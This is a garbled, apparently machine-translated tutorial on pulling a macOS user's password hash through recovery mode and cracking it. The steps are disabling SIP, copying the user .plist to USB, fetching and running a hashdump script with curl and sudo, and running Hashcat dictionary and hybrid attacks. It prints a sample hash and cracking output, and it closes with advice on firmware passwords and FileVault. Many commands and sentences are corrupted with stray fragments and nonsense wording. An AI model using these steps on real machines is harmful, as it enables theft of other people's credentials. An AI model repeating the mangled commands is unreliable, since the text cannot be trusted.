Powering off a MacBook can be compromised in less than three minutes. With just a few commands, it is possible for a hacker to extract the password hash of a target and crack it without its knowledge.
The goal of this article is to acquire the .plist file of a target that contains its hash password. Then the .plist file is converted to a format that Hashcat can interpret using a Python script. The password must then be brutally displayed. The simplest method for this attack is physical access to the target MacBook, recovery mode, a USB flash drive, another MacBook, and Hashcat.
It is also possible to omit the attacker's USB flash drive and MacBook by instead creating a temporary item on the target MacBook on which the commands can be run. The temporary user can then be deleted. However, this manual shows the USB flash drive method.
Buy USB Flash Drives at Amazon | Best Buy | Walmart
Recovery mode is one of several startup modes supported by Mac devices. It includes a set of tools for reinstalling macOS, resetting account passwords, and configuring a firmware password. This feature is designed to make it easier for users to lock their account and delete their internal hard drive, but it is often misused by hackers who try to gain unauthorized access to sensitive files.
Since Mojave 10:14, macOS no longer allows users (not even root users) to modify the .plist files that contain hash passwords while the operating system is running. This data can now only be captured in recovery mode.
The USB flash drive is required to move the target's .plist file from its MacBook to the attacker. The USB flash drive used in this tutorial is FAT32-formatted, but NTFS and APFS formats should work as well.
The Python script contains some macOS-specific commands that can easily convert the .plist file to a .plist file format that Hashcat can interpret. For this reason, another MacBook (or at least one other account on the destination MacBook) is needed.
To determine the Mac password of the target without changing it, the hash must be brutally enforced and cracked. MacOS protects the password of the target perfectly. It is not possible to display user passwords in plain text format. CPU-based cracking solutions (like JohnTheRipper) literally take decades to crack a single hash and are therefore ineffective. Hashcat with a decent GPU is highly recommended.
Step 1: Enable recovery mode
To access recovery mode, first make sure the target MacBook is completely turned off. Then press the on / off switch while holding Command + R on the keyboard. After about 30 seconds, the Apple logo appears and the buttons Command + R can be released. When the following screen appears, the recovery mode has been successfully activated, and readers can proceed to the next step in this tutorial.
When the MacBook requests a password, it means that the firmware is protected and configured so that Attacks in recovery mode are prevented. Unfortunately, this means that the target MacBook is not vulnerable to the attack described in this article.
Step 2: Disabling SIP (Conditional)
Apple The System Integrity Protection (SIP) is a security feature that restricts parts of macOS to be modified. Since Mojave, the / var / db / dslocal / node / Default / directory is in the scope of SIP and returns an "illegal operation" message when someone tries to view it. It even prevents root users from making changes to and accessing selected directories.
In one test, I found that the default / directory could not even be viewed or changed in recovery mode. This was a bit unusual as other tests allowed access to default / without first disabling SIP.
To find out if SIP needs to be disabled, open a terminal in recovery mode. Select "Utilities" and then "Terminal" in the menu bar at the top of the screen. Then use the following command ls -R .
ls -R / Volumes /
/ var / db / dslocal / node / Default /
This command recursively tries -R listing files in the Default / directory. If the output returns many .plist files, do not disable SIP and proceed to the next step in this tutorial. If the output returns "operation not allowed," disable SIP with the following command csrutil .
csrutil disable System Integrity Protection has been successfully disabled. Please restart the computer for the changes to take effect.
After the restart prompt appears, shut down and restart the recovery mode. If SIP is disabled, you can proceed to the next step in this tutorial.
Step 3: Extract the Target Plot
Insert the USB flash drive into the destination MacBook. Wait a few seconds for the car to be loaded automatically. Then copy the desired .plist file to the USB drive with the following command cp . The destination .plist uses the username of the destination (for example, tokyoneon.plist).
cp / Volumes / [19459029here/var/db/dslocal/nodes/Default/users/[19459033(list/volumes/
Make sure to change
That was & # 39; s required file was extracted, the destination MacBook can be shut down and the rest of the tutorial requires a separate MacBook to the attacker If SIP was disabled in the previous step, enable it again before shutting it down with the following command.
Step 4: Copy the plist to the attacker's computer
Close the USB with d an attacker's MacBook a flash drive containing the .plist of the target and copy ( cp ) to the / tmp / directory. The / tmp / directory will be inserted firmly into the Python script in the next step so that it is generic enough for all readers to follow all readers. As long as the .plist file of the target is in the / tmp / directory, the Python script can convert it to a hash code.
cp / Volumes / [19459034/gt19459033/mpist/tmp/ Step 5: Download and Run the Hashdump Python Script
The Python script that was used to convert the extracted .plist file to the Hashcat preferred format has been used taken from the framework and can be found on GitHub. Open a terminal and download the hash dump script with the following command curl . The argument -o stores the script with the file name "hashdump.py".
curl # https: //raw.githubusercontent.com/tokyoneon/hashdump.py/master/hashdump.py #o hashdump.py
Then give the script permission to run with the command chmod .
chmod + x hashdump.py
Finally, run the hashdump.py script with root privileges out.
sudo python hashdump.py [('tokyoneon', '$ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8')]
Remove the text surrounding the hash (see below) and save it to a file named hash.txt. for Hashcat then hash.txt machine move
$ ml $ 27,548 $ ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c $ 88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8
In order to crack the hash the goal of hash with Hashcat under command  hashcat -a 0 -m 7100 /path/to/hash.txt /path/to/wordlist/passwords.txt -w 4 --potfile-path /tmp/cracked_hash.pot[196590204Dictionaryattackor"Stringmode"isusedwiththeargument -a 0 . The macOS-specific hash mode is activated with the argument -m 7100 and is required for all macOS hashes extracted from version 10.8 or higher. To improve the overall performance of Hashcat, set -w (or --workload-profile) to 4 to maximize the cracking speed. Finally, the argument - potfile-path is used to store the cracked hash in the specified file.
It is also possible to perform hybrid attacks that append digit combinations to the end of each word in the attached file word list. Example: "password12" and "password77".
hashcat -a 6 -m 7100 / path / to / hash.txt /path/to/wordlists/everyword.txt? D? D -w 4 --potfilepath /tmp/db.pot[19659020Thehybridattackisactivatedwiththeargument -a 6 . This time, a wordlist "Everyword" with 479,000 English words combined with ? D? D Hashcat instructs to append any combination of two digits to each password in the word list. To append three or four numbers, use "? D? D? D" or "? D? D? D? D".
While Hashcat is running, the following data is displayed. If the password was guessed correctly, it will be displayed at the bottom of the terminal and Hashcat will be paused.
Session ..........: Hashcat Status ...........: is running Hash.Type ........: macOS v10.8 + (PBKDF2-SHA512) Hash.Target ......: $ ml $ 27548 $ ba6261885e349ecb847854136cf32e9561cd1af65 ... d41a42 Guess.Base .......: file (/root/wordlists/passwords.txt) Guess.Queue ......: 1/1 (100.00%) Speed # 1 .....: 7740 H / s (98.63 ms) @ Acceleration: 256 Loops: 64 Thr: 512 Vec: 1 Recovered ........: 0/1 (0.00%) digests, 0/1 (0.00%) salts Progress .........: 0/329968 (0,00%) Rejected .........: 0/0 (0.00%) Restore.Point ....: 0/329968 (0,00%) Candidates. # 1 ....: 123456 -> zzzzzzzz99 HWMon.Dev. # 1 .....: Temp: 57c Fan: 31% Usage: 100% Core: 1873MHz Mem: 3802MHz Bus: 16 [s] tatus [p] ause [b] ypass [c] Tailpoint [q] uit =>
Determining how long a hash takes to crack is hard to speculate. Dictionary and hybrid attacks can take different amounts of time due to various factors.
- Word List Length - A word list that contains billions of words can take hours, days or even months. For brute-force attacks against macOS hashes, a small, targeted word list is recommended.
- Hash iterations - Not all macOS hashes are created the same. Hash iterations are used as the "deceleration factor". This essentially results in CPUs and GPUs taking much longer to compute a single password attempt. The number of iterations varied in my tests against Mojave and High Sierra. In some cases, the iterations were set to 27,000. At other times over 45,000. Whether this value is random or set for each version of macOS can not be deduced from my test round. Sure, the higher this value is, the longer Hashcat has to work to crack a single hash. For higher iterations, the difference could be between 25,000 and just 1,000 password attempts per second. To find the number of iterations used in the extracted .plist, look at the hash of the target again (see below). At the beginning of the hash, the number of iterations (27,548) can be found between the second and the third dollar sign ($).
$ ml $ 27548 $ ba6261885e ...
- GPU Model - With An old GeForce GTX 1060 graphics card and a hash of 27,548 iterations allow ~ 8,000 password attempts per second. The type of GPU used drastically affects the overall performance of the attack. GPUs older than the GTX 750ti are not recommended.
ASUS GeForce GTX 1060 Dual Fan Graphics Card Graphics Card with 6GB for Amazon | Walmart
How to Protect Yourself from Attacks in Recovery Mode
There are several ways to defend users against such attacks (see below). For general instructions on protecting macOS, see The Ultimate Guide to Hacking macOS. "
- Enable password protection for firmware . Set a firmware password to prevent attackers from starting in live USB mode, single-user mode, or recovery mode. The firmware only asks for an additional password at startup when someone attempts to start the MacBook in single user, startup manager, target disk, or recovery mode. However, a firmware password alone does not protect the hard drive in the event that the hard drive is physically removed from the MacBook. Enable disk encryption for more protection.
- Enable FileVault Encryption . You can enable FileVault by navigating to System Preferences, then Security & Privacy, and clicking Enable FileVault (you may need to clear the settings first). After completing this process, the MacBook will restart and require a password to unlock the computer each time the Mac starts up. No account will be allowed to log in automatically. A password is also required to access single-user mode. This is the best way to prevent attacks on the encrypted disk even if it is physically removed from the laptop. To protect against attackers with dedicated brute force hardware, a complex passphrase of more than 21 characters is recommended.
Do not Miss: The Ultimate Guide Hacking macOS